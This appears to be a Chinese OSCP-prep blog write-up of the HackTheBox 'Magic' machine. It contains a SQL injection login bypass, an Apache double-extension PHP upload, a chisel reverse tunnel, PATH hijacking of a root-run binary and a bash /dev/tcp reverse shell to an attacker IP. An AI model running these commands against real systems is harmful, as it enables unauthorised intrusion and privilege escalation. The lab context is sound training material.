OSCP备考_0x26_HackThBox靶机_Linux_magic

Ethan医生1天前靶场9


nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.216.125 (扫描TCP)


image.png


nmap -sU --top-ports 100 10.129.216.125 (扫描UDP)

image.png


直接输入账号 绕过admin' or 1=1#,代表存在SQL注入

http://10.129.216.125/upload.php

image.png

mysqldump -utheseus -piamkingtheseus --all-databases > data.sql

或者使用

 
1.在本地kali执行
./chisel server -p 8000 -reverse
2.在目标靶机上执行
./chisel client 10.10.16.31:8000 R:3306:127.0.0.1:3306 &

在本地kali连接mysql数据库
mysql -h 127.0.0.1 -P 3306 -u theseus -piamkingtheseus

使用--current-user查看发现当前用户为theseus@localhost,并不是root。进一步查看数据库Magic发现用户名和密码,如图

image.png

使用该用户名和密码可以登录到上传页面。尝试使用用户名admin,theseus和密码Th3s3usW4sK1ng通过SSH登录目标主机失败。

Apache解析漏洞

http://10.129.216.125/images/uploads/fz.php.jpg

访问图片地址发现没显示图片,而是成功解析了php代码,如图:

image.png


image.png

su theseus

image.png

image.png

运行该程序可以看到CPU、内存和磁盘信息及使用情况。将pspy32上传到目标主机,然后将命令放入后台执行(./pspy32 &),再次执行/bin/sysinfo发现程序以root用户执行了lshw、fdisk和free命令,如图:

由于Linux中命令执行的优先级是:绝对路径或相对路径 > alias > 内部命令 > $PATH环境变量定义的目录查找顺序中找到的第一个命令。尝试使用alias劫持命令不起作有,然后使用PATH成功劫持命令。如图:

PATH=~:$PATH:这个命令将用户的家目录添加到 PATH 环境变量的最前面,并用冒号 : 分隔。这样,系统在查找可执行文件时,会首先在用户的家目录中查找,然后再在原来的 PATH 目录中查找。

echo 'id' > lshw

/bin/sysinfo

image.png

由于/bin/sh指向dash,直接使用bash命令会报错,尝试多次都无法直接使用bash反弹shell。最后发现执行echo 'echo "bash -i >&/dev/tcp/10.10.16.31/3334 0>&1" | /bin/bash' >lshw可以利用/bin/sysinfo反弹Shell了,如图:


image.png


标签: OSCP

相关文章

OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.128.76 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.3.150 (扫描TCP)nmap -sU --top-ports 100 10.129.3.15...

OSCP备考_0x23_HackThBox靶机_Linux_mango

OSCP备考_0x23_HackThBox靶机_Linux_mango

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.108.26 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-12-3,24/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x04_HackThBox靶机_Linux_cronos

OSCP备考_0x04_HackThBox靶机_Linux_cronos

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)nmap -sU --top-ports 100 10.129.184.136...

OSCP备考_0x14_Vulnhub靶机_Raven: 2

OSCP备考_0x14_Vulnhub靶机_Raven: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-2,269/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。